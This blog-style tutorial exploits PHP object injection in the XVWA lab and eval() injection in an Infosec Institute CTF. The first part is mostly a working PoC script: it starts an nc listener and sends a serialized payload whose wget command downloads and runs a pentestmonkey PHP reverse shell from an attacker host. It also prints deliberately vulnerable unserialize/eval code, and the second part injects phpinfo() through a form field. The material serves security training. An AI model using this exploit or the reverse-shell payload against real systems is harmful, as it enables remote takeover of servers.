Exploiting PHP Serialization/Object Injection Vulnerabilities

This is a short blog post on exploiting PHP Serialization/Object Injection vulnerabilities in order to gain remote shell access to the host. For more information on PHP serialization, go here: https://www.owasp.org/index.php/PHP_Object_Injection. If you would like to test this yourself, there are some great resources available, such as: XVWA (https://github.com/s4n7h0/xvwa) and Kevgir (https://canyoupwn.me/kevgir-vulnerable-vm/).

Detect

The first step in the exploitation process is to detect the presence of PHP serialization in the application we are testing. To assist, we can use SuperSerial for Burpsuite which can be downloaded here: https://www.directdefense.com/superserial-java-deserialization-burp-extension/ (see below). This will passively detect the presence of PHP and Java serialization in the application we’re testing.

Analyze

Now that we’ve detected PHP serialization in the application, we can confirm if remote code execution is possible by analyzing the source code for the application (if available…). As seen below, the important thing to note is that serialized objects are taken from the “r” parameter ($var1=unserialize($_REQUEST[‘r’]);) and unserialized and eval’ed (eval($this->inject);), then displayed via (echo “< br/>”.$var1[0].” – “.$var1[1];). Given this, code execution appears to be possible if we pass PHP serialized objects to the “r” parameter! 🙂

< ?php 
    error_reporting(E_ALL);
    class PHPObjectInjection{
        public $inject;

        function __construct(){

        }

        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
    if(isset($_REQUEST['r'])){  

        $var1=unserialize($_REQUEST['r']);
        

        if(is_array($var1)){ 
            echo "
".$var1[0]." - ".$var1[1];
        }
    }else{
        echo "parameter is missing";
    }
? >

Exploit

To exploit this flaw, we can create a simple PHP script to generate our PHP serialized payload automatically and run whatever commands we want on the remote host. In this case, I chose to create a versatile reverse shell via PHP using this script (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz). NOTE: You will need to host this file on your web server and update the local IP and port in the reverse shell script as well as update the below exploit code to point to your server…

< ?php 
/*
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com

A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 

Shouts to @jstnkndy @yappare for the assist!

NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
*/

print "==============================================================================\r\n";
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://xerosecurity.com\r\n";
print "==============================================================================\r\n";
print "[+] Generating serialized payload...[OK]\r\n";
print "[+] Launching reverse listener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp 1234\'');

class PHPObjectInjection
{
   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
   public $inject = "system('wget http://yourhost/phpobjbackdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}

$url = 'http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...[OK]\r\n";
print "[+] Dropping down to interactive shell...[OK]\r\n";
print "==============================================================================\r\n";
$response = file_get_contents("$url");

? >

Demo

Now that our exploit is ready, we can execute it to get a nice reverse shell on the remote host for full remote command execution! Shout to @jstnkndy @yappare for the assist! -1N3

Exploiting PHP Eval() Functions

OVERVIEW:

A quick PoC/tutorial on executing arbitrary PHP code via PHP’s eval() function in Infosec Institutes Level 2 CTF challenge. Full details on the challenge can be found here: http://ctf.infosecinstitute.com/ctf2/. All credits go to [email protected]

STEP 1: Understanding the use of eval()

Based on the applications function, we can guess that the application is using similar backend code to calculate the result:

<?php eval(\"$num1\" \"$operand\" \"$num2\"); ?>

STEP 2: Editing the operand field

Since there appears to be server side validation preventing non-integer values for $num1 and $num2, we can try to edit the operand field to get our injected PHP code to run. This can be done using a web browser and right-clicking the element and selecting “Inspect Element”.

STEP 3: Edit the operand field to inject our PHP code

To inject our PHP code, we will edit the operand field as shown below to control the execution of the original function without producing an error:

<option value=" + 1; phpinfo(); 1 + "> + 1; phpinfo(); 1 + </option>

RESULT:

After clicking Submit, you will notice that our injected PHP function is executed and displayed. To prevent these types of attacks, all use of eval() should be avoided at all costs and all user input should be sanitized and validated before being executed.